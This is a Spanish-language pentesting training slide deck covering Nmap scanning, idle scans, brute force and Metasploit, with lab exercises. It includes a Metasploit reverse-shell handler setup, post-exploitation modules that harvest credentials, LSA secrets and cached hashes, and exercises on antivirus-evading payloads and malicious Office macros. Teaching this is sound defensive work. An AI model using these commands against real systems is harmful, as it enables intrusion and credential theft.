SlideShare una empresa de Scribd logo
● Soy fundador/Consultor de Websec México:
http://websec.mx
● Fuí parte del programa Google Summer Of Code 2011:
https://code.google.com/p/google-summer-of-code-2011-nmap/
● Soy desarrollador NSE del proyecto Nmap:
http://nmap.org
● He contribuido con módulos oficiales del proyecto Metasploit:
http://www.rapid7.com/db/search?q=paulino+calderon
#cat /etc/about
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● He desarrollado algunas apps de Android:
○ Mac2wepkey HHG5XX (+5 millones de descargas)
https://play.google.com/store/apps/details?id=mx.websec.
mac2wepkey.hhg5xx
○ IP2hosts (+5 mil descargas)
https://play.google.com/store/apps/details?id=websec.ip2hosts
○ Vecinitum de fibra (+10 mil descargas)
https://play.google.com/store/apps/details?id=mx.websec.
mac2wepkey.al
#cat /etc/about
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Y he escrito un par de libros:
○ Nmap 6: Network Exploration and Security Auditing Cookbook (5
estrellas en Amazon)
http://www.amazon.com/Nmap-exploration-security-auditing-
ebook/dp/B00AC1HF8W/
○ Mastering the Nmap Scripting Engine (Nov 2014)
http://www.amazon.com/Mastering-Scripting-Engine-Paulino-
Calderon/dp/1782168311/
Entre otras cosas: http://calderonpale.com
#cat /etc/about
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Paulino Calderón Pale
calderon@websec.mx
Twitter: @calderpwn
WWW: http://calderonpale.com
#cat /etc/contact
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Pentesting 101
Introducción a las pruebas de penetración
Pen testing 101
● ¿Qué es un pentest?
● ¿Qué se obtiene de un buen pentest?
● ¿Cómo podemos llegar a ser buenos pentesters?
Paulino Calderon Pale <calderon@websec.mx>Pentesting 101
Pentesting 101
● Existen varias metodologías y guías:
○ Penetration testing execution standard.
○ Open Source Security Testing Methodology Manual.
○ Technical Guide to Information Security Testing and
Assessment.
○ SANS’ Critical Security Controls.
○ OWASP TOP 10.
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Pentesting 101: Fases
● Definición de alcance
● Information gathering
● Identificación de amenazas
● Identificación de vulnerabilidades
● Explotación de vulnerabilidades
● Post explotación
● Generación de reportes =/
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● Recolección de información
○ Descubrimiento de activos con Nmap
● Explotación de vulnerabilidades
○ Explotación de vulnerabilidades con Metasploit
○ Uso del framework de explotación Veil
● Otros ataques
○ Ataques de ingeniería social con psploitgen
Agenda
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Exploración de redes:
● Conceptos TCP/IP.
● Fundamentos básicos de Nmap
● Técnicas de descubrimiento de hosts
● Identificación de sistemas operativos
● Técnicas de escaneo de puertos
● Identificación de servicios
● Recolección de información
● Ataques de fuerza bruta
● Detección de vulnerabilidades
Explotación de vulnerabilidades:
● Uso de metasploit para la explotación de vulnerabilidades
● Identificación de servicios vulnerables
● Exfiltración de información utilizando metasploit
● Evasión de antivirus con Veil Evasion
Ataques de ingeniería social:
● Ataques de phishing
● Evasión de filtros con pssploitgen
¿Qué aprenderemos?
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● Kali 32 bits (root:toor)
Máquinas vulnerables:
● P1
●
Información de máquinas virtuales
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Information gathering
Recolección de información
Descubrimiento de activos
● Siempre usen Wireshark para analizar el tráfico como
ejercicio inicial.
● ¿Sabemos que equipos estan conectados a la red?
● ¿Cómo podemos hacer este proceso de la forma más
eficiente?
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Wireshark
● Rápidamente se pueden listar los hosts comunicándose
en la red.
● Permite aplicar filtros para visualizar fácilmente la
información que necesitamos.
● Se obtiene mucha información sobre la red solo con
mirar el tráfico por 15 minutos.
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Plugins de Wireshark
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Wireshark 101
● Algunos filtros útiles son:
○ tcp.port==80
○ ip.addr==192.168.1.1
○ ip.src==192.168.1.1 o ip.dst==192.168.1.1
○ http
○ http.request
○ tcp contains password
○ !(arp or icmp or dns)
○ eth.addr==de:ad:be:ef:ca:fe
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
● Analiza el tráfico de la red actualmente.
○ ¿Qué protocolos son los más usados?
○ ¿Detectaron alguna posible vulnerabilidad?
El arte de la exploración de redes informáticas Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Conceptos TCP/IP
Antes de continuar unos conceptos:
● Conexión TCP de 3 vías
● Banderas TCP/IP
● Notación CIDR
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Conexiones TCP
Las conexiones TCP requieren iniciar una conexión para
transmitir o recibir datos.
Debemos entender el protocolo de enlace de tres vías.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Establecimiento de conexión TCP:
Enlace de 3 vías
● Host #1 envia un paquete SYN a Host #2.
● Host #2 envia SYN/ACK a host #1
● Host #1 envia ACK a host #2 y se establece la
conexión.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Notación CIDR (IPv4)
● Dirección IP más sufijo:
192.168.0.1/24
● Algunas equivalencias:
○ /32 ==1 host ==
○ /24 ==254 hosts==255.255.255.0
○ /16==65,534 hosts==255.255.0.0
● En UNIX existe la herramienta ipcalc.El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Notación CIDR (IPv4)
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Nmap
● Página oficial: http://nmap.org
● Nmap es una herramienta de código abierto para
exploración de redes y auditorías de seguridad.(*)
● Se diseñó para analizar rápidamente grandes redes,
aunque funciona muy bien contra equipos individuales.
(*)
● Esencial para pentesters y administradores de
sistemas.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descargando e instalando Nmap
Para descargarlo desde el repositorio oficial:
$svn co https://svn.nmap.org/nmap
Para instalarlo:
$./configure
$make
#make install
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Dependencias
● libssl-dev
● autoconf
● make
● g++
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Manteniendo tu copia al día
● Para actualizar su copia de nmap:
$svn up
$make -j4
#make install
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Ejecute Nmap e identifique que información
regresa.
$nmap <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Ejecute Nmap e identifique que información regresa.
Nmap scan report for scanme.nmap.org
Host is up (0.011s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Escaneo básico de Nmap
Un escaneo de Nmap sin argumentos regresa:
○ Estado del objetivo (en línea/desconectado)
○ La dirección IP y nombre de host.
○ Lista de servicios y puertos.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Inicien un escaneo a su propia máquina.
● ¿Qué encontraron?
● ¿Algún servicio que no sabían que existía?
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Guardando escaneos de Nmap
Para guardar escaneos en los formatos grepable, XML y
normal utilicen el argumento “-oA”:
$nmap -oA escaneo1 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Resolución de nombres (DNS)
● Servidores DNS resuelven nombres de dominio a
direcciones IP.
● ¿Qué servidores usan?
○ Los de su ISP
○ Google (8.8.8.8 y 8.8.4.4)
○ Internos
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Especificando servidores DNS
Para especificar que servidores DNS debe usar
Nmap:
$nmap --dns-servers 8.8.8.8,8.8.4.4
<objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
¿Por qué hacer descubrimiento de
hosts?
● Para realizar un inventario de los equipos conectados a
nuestra red.
● Para descubrir que equipos estan activos.
● Para optimizar el proceso de descubrimiento de
servicios.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo equipos en la red
● Nmap utiliza las siguientes técnicas:
● SYN/ACK
● UDP
● SCPT INIT
● ICMP
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo equipos en la red
Durante la fase de descubrimiento de hosts,
por default Nmap envia:
● Una petición ICMP Echo Request
● Un paquete TCP SYN a puerto 443
● Un paquete ARP al puerto 80
● Una petición ICMP Timestamp
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo equipos en la red
● Mandando ICMP Echo Requests a solo un
host:
ping <objetivo>
● O con Nmap:
$nmap -sP -PE <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo equipos en la red
● Si estan en la misma red Nmap utilizará
peticiones ARP.
● Si la red es externa usará escaneo
ICMP/SYN.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
TCP SYN Ping
● Nmap utilizará los paquetes de respuesta RST o
SYN/ACK para determinar si el objetivo está en línea.
● Por default se manda al puerto 80.
nmap -PS80 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
TCP ACK Ping
● Nmap utilizará los paquetes de respuesta RST para
determinar si el objetivo está en línea.
● Por default se manda al puerto 80.
● Requiere privilegios para crear raw sockets. De lo
contrario usa el método TCP SYN.
nmap -PA80 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
UDP Ping
● Un host responde con el mensaje ICMP port unreachable cuando se envía
un paquete UDP a un puerto cerrado.
● El host puede responder con otro tipo de mensajes de error ICMP.
● Nmap utiliza estos mensajes para identificar si un host esta en linea.
● Es importante lanzar este “probe” contra un puerto cerrado.
#nmap -PU21,80,53 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
SCTP INIT Ping
● Un host responde con ABORT o INIT ACK si esta en
línea.
● Este tipo de escaneo requiere privilegios para crear
paquetes “raw”.
● Este probe es enviado al puerto 80 por default.
# nmap -PY80 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
IP Protocol Ping
● Lanza paquetes IP para tratar de ocasionar algún tipo
de respuesta.
● Por default Nmap usa los siguientes protocolos:
○ ICMP (protocolo #1)
○ IGMP (protocolo #2)
○ IP-in-IP (protocolo #4)
#nmap -P0 <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Personalizando “probes” de
descubrimiento
Se puede personalizar los puertos que son utilizados para
la fase de descubrimiento de hosts.
# nmap -sP -PS22,3389 192.168.0.1/24
# nmap -sP -PU53 192.168.0.1/24
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo equipos en la red
● Barrido DNS:
$nmap -R -sn <objetivo(s)>
$nmap --dns-servers server1,server2 -R -
sn <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo equipos en la red
| broadcast-upnp-info:
| 192.168.0.5
| Server: TP-LINK/TL-SC3230N/6.E.2.10117/169.254.88.241
| Location: http://192.168.0.5:49152/edevicedesc.xml
| 192.168.0.8
| Server: Linux/3.0.8, UPnP/1.0, Portable SDK for UPnP devices/1.6.14
| Location: http://192.168.0.8:49152/description.xml
| 192.168.0.42
| Server: Microsoft-Windows/6.2 UPnP/1.0 UPnP-Device-Host/1.0
|_ Location: http://192.168.0.42:2869/upnphost/udhisapi.dll?
content=uuid:383283d1-d95c-4211-9525-b27af762e967
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Descubre que información existe en la red actual usando
peticiones de tipo multicast.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Descubre que información existe en la red actual usando
peticiones de tipo multicast.
$nmap --script broadcast -sn -Pn -n
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Identificación de sistema operativo
La funcionalidad de detección de sistema operativo
requiere de privilegios especiales, específicamente
permisos para crear “raw sockets”.
#nmap -sV -O <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Identificación de sistema operativo
Limitar escaneo a objetivos con un puerto abierto y uno
cerrado:
#nmap -sV -O --osscan-limit <objetivo(s)>
¿Qué hacer si Nmap no detecta el sistema operativo?
#nmap -sV -O --osscan-guess <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Evadir la detección de sistema operativo en
un ambiente UNIX.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Evadir la detección de sistema operativo.
#echo 128 > /proc/sys/net/ipv4/ip_default_ttl
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Desactivando escaneo de puertos
● Para desactivar el escaneo de puertos se
usa el argumento “-sn”:
$nmap --script broadcast -sn
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Desactivando descubrimiento de hosts
● Para desactivar la fase de descubrimiento de hosts:
$nmap -Pn -p80 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Técnicas de escaneo
● TCP SYN
● TCP Connect
● UDP
● TCP Null
● FIN
● XMAS
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Posibles estados de un puerto
● open (abierto)
● closed (cerrado)
● filtered (filtrado)
● unfiltered (no filtrado)
● open|filtered (abierto|filtrado)
● close|filtered (cerrado|filtrado)
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Especificando puertos
● Para especificar un rango
$nmap -p1-100 <objetivo(s)>
● Pueden listar diferentes puertos separandolos con
comas:
$nmap -p22,23,80 <objetivo(s)>
● Pueden escanear absolutamente todos los puertos
disponibles
$nmap -p- <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Especificando puertos
● También se pueden usar nombres de servicios
$nmap -p smtp <objetivo(s)>
● Y nombres de servicio con wildcards:
$nmap -p smtp* <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Detección de servicios
Para iniciar el modo de detección de servicios
se usa el argumento “-sV”:
$nmap -sV <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
¿Qué hacer cuando no los detecta?
Nmap determina que firmas usar basado en un nivel de
“rareza”.
Si el servicio que queremos identificar corre en un puerto
no estándar:
$nmap -sV --version-all <objetivo(s)>
$nmap -sV --version-intensity 9 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Identificación de servicios vulnerables
¿Cómo usamos esta información para saber si un servicio
es vulnerable?
Si la identificación de versión es exitosa simplemente
tenemos que revisar que vulnerabilidades han sido
publicadas antes.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Timing templates
● Existe un alias para usar diferentes configuraciones de
rendimiento y ajustes de tiempos de espera
predeterminados: -T1-5.
● T3 es el valor default que Nmap usa.
$nmap -sV -O -T4 <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Otros valores interesantes de
optimización
min-hostgroup/max-hostgroup: Número de hosts a
escanear simultáneamente.
min-parallelism/max-parallelism: Número de transmisiones
simultáneas.
max-retries: Número de retransmisiones.
host-timeout: Tiempo de espera antes de ignorar un host.
scan-delay: Tiempo de espera entre “probes”.
min-rate/max-rate: Número de paquetes por segundo.El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
TCP SYN Scan
● Escaneo utilizando técnica de “media conexión”.
● Método default de escaneo en Nmap.
#nmap -sS <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
TCP Connect Scan
● Técnica de escaneo que establece una conexión
completa para determinar si
● Método default de escaneo en Nmap ejecutándose sin
privilegios.
$nmap -sT <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
TCP ACK Scan
● Útil para detectar firewalls.
● Esta técnica solo determina si los puertos estan
filtrados o no filtrados. Es decir, no determina si el
puerto esta abierto o cerrado.
$nmap -sA <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Idle scan
El idle scan es una técnica en la cual usamos la
predictibilidad del número de secuencia TCP IP de una
máquina ”zombie” para escanear a nuestro objetivo
escondiendo nuestro verdadero origen.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Idle scan
Esta técnica depende de la predictibilidad del número de
secuencia TCP ID
Un candidato bueno para ser usado como zombie:
Debe de estar ”idle”.
En nuestro mismo netblock de preferencia.
Impresoras, web cams y routers son muy buenos
candidatos.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Idle scan
Para encontrar zombies:
#nmap -F --script ipidseq -n <host/ip>
#nmap -O -v <host/ip>
Usandolos:
#nmap -Pn -sI ZOMBIE OBJETIVO
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Idle scan
Checamos el IP ID del zombie
Mandamos paquete SYN spoofeado como si viniera del
zombie
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Idle scan
● El objetivo regresa un SYN/ACK
● El zombie regresa un RST e incrementa su IP ID
● Nosotros checamos el IP ID, si incremento el puerto
esta abierto.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Tarea para después
● Encuentra un host con id de secuencia TCP IP
incremental.
● Determinemos si nuestro ISP tiene protección contra
paquetes spoofeados
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
IP Protocol Scan
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Ndiff
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Herramienta diseñada para comparar escaneos de
Nmap.
Toma escaneos guardados en formato XML.
$ndiff scan1.xml scan2.xml
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
● Implementar un sistema de monitoreo utilizando Nmap
y Ndiff.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
● Implementar un sistema de monitoreo utilizando Nmap
y Ndiff.
1. Realizar un escaneo que refleje el estado
“bueno” de la red.
2. Utiliza Ndiff para comparar el estado actual con
el primer escaneo realizado.
3. Automatiza la tarea!
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Desarrollo NSE (Nmap Scripting Engine) Paulino Calderon
calderon@websec.mx
● Motor de scripts que ha expandido la funcionalidad de
Nmap en todos los aspectos.
● Actualmente existen más de 400 scripts (435 el día que
escribí esto) en el repositorio oficial.
NSE == "Nmap Scripting Engine"
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Más consejos de uso
● Es difícil recordar el nombre de todos los argumentos.
Mantengan abierta una consola en el folder de los scripts y
usen:
cat <script> | grep @args
● No existe una función de autocompletar. ( Entren al
folder de scripts y ejecuten sus escaneos desde ahí? ).
Desarrollo NSE (Nmap Scripting Engine) Paulino Calderon
calderon@websec.mx
http://guadalajaracon.org
GuadalajaraCON
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Ataques de fuerza bruta
Una de las funciones más poderosas de NSE. Existen 51 protocolos
soportados en este momento.
Los argumentos relevantes cuando trabajamos con estos scripts son:
● userdb: Archivo que contiene los nombres de usuario.
● passdb: Archivo que contiene las posibles contraseñas.
● firstOnly: Detener el script cuando se encuentre la primera combinación
válida.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Realiza un ataque de fuerza bruta contra el servicio de
MySQL de la máquina #3.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Práctica
Realiza un ataque de fuerza bruta contra el servicio de
MySQL de la máquina #3.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Recolección de información
Además de la lista de servicios existe más información que
nos puede ser de ayuda como:
● Nombres virtuales de dominio.
● Entradas DNS con nombres comunes.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Recolección de información
Además de la lista de servicios existe más información que
nos puede ser de ayuda como:
● Nombres virtuales de dominio.
● Entradas DNS con nombres comunes.
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo entradas DNS
El script dns-brute lanza un ataque de diccionario para
encontrar entradas DNS.
$nmap --script dns-brute <objetivo(s)>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo sitios móviles
Existe el script http-mobileversion-checker que compara
peticiones usando diferentes cabeceras User Agent para
descubrir sitios móviles:
$nmap -p80,443 --script http-mobileversion-
checker <objetivo>
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Descubriendo vulnerabilidades de
inyección de código en webapps
NSE también tiene scripts para automatizar la detección de
posibles vulnerabilidades de tipo:
● Cross Site Scripting
● SQL Injection
● Local File Inclusion
El arte de la exploración de redes Paulino Calderon
calderon@websec.mx
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Explotación de
vulnerabilidades
Metasploit 101
Metasploit es un framework de explotación de
vulnerabilidades que actualmente cuenta con:
● +1,300 exploits
● +700 módulos auxiliares
● +300 payloads
● +30 encoders
http://www.metasploit.com/
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● Integración con PostreSQL.
● Meterpreter
Metasploit 101: Otros aspectos interesantes
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Para realizar búsquedas:
search “oracle”
Para establecer valores de variables:
set <VARIABLE> <VALOR>
Para establecer valores de variables:
setg <VARIABLE> <VALOR>
Para obtener información sobre un módulo:
info <modulo>
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Para seleccionar un módulo:
use <modulo>
Para ver las opciones del módulo:
show options
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Listado de sesiones activas:
sessions -l
Iniciar modo interactivo con alguna sesión
sessions -i <# de sesión>
Para regresar a la consola de msf
background
Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Ejecución de múltiples comandos
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 443
set ExitOnSession false
set AutoRunScript multi_console_command -rc autorun-msf.rc
exploit -j
Ejecución de múltiples comandos
run post/windows/escalate/getsystem
run post/windows/gather/credentials/credential_collector
run post/windows/gather/lsa_secrets
run post/windows/wlan/wlan_profile
run post/windows/gather/cachedump
run post/windows/gather/enum_db
run post/windows/gather/screen_spy
● Obtén la mayor cantidad de llaves de las máquinas
vulnerables.
Prácticas: Metasploit 101
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● ¿Cómo funcionan los AVs?
● ¿Qué vamos a hacer si casi el 100% de las
organizaciones utilizan algún AV?
● ¿AV is dead?
Evasión de antivirus
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● Genera un binario de meterpreter que no sea detectado
por el AV instalado en tu sistema.
Práctica: Evasión de antivirus
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Existen otros ataques de redes que funcionan cerca del 100% del tiempo:
● WPAD spoofing
● LLMNR spoofing
● ARP spoofing
Otros ataques a redes
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Ataques de ingeniería
social
● ¿Qué es un ataque de ingeniería social?
● ¿Qué tan efectivos son estos ataques?
Ataques de ingeniería social
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● Crea un documento de Office con un macro malicioso
Práctica: Ataques de ingeniería social
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● ¿Qué hacemos una vez que tenemos nuestra primera
cuenta?
● ¿Qué información necesitamos recolectar en esta
etapa?
Post explotación
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● VMWare: http://vmware.com
● Virtualbox: http://virtualbox.com
● Kali: http://kali.org
● Wireshark: http://wireshark.com
● Nmap: http://nmap.org
● Metasploit: http://metasploit.com
● Responder: https://github.com/SpiderLabs/Responder
● Veil Framework: https://github.com/Veil-Framework/
● Psploitgen: https://bitbucket.org/jsthyer/psploitgen
● Vulnhub: http://vulnhub.com/
● Pentester Lab: http://pentesterlab.com/
#cat /etc/resources
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
● OWASP: https://www.owasp.org/index.php/Main_Page
● OSTMM: http://www.isecom.org/research/osstmm.html
● Penetration Testing Execution Standard: http://www.pentest-standard.
org/index.php/Main_Page
#cat /etc/resources
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Paulino Calderón Pale
calderon@websec.mx
Twitter: @calderpwn
WWW: http://calderonpale.com
#cat /etc/contact
Pentesting 101 Paulino Calderon Pale <calderon@websec.mx>
Pentesting 101 por Paulino Calderon

Más contenido relacionado

La actualidad más candente

Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Dragonjarcon2015 - ¿Cómo programar aplicaciones seguras? por Paulino Calderon...
Websec México, S.C.
 
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Explotación de vulnerabilidades recientes de Windows - Agosto 2017
Websec México, S.C.
 
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Búsqueda de vulnerabilidades en aplicaciones de Android [GuadalajaraCON 2013]
Websec México, S.C.
 
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
Abraham Pasamar & Carlos Fernández - Purple brain, purple brain ... [rooted2019]
RootedCON
 
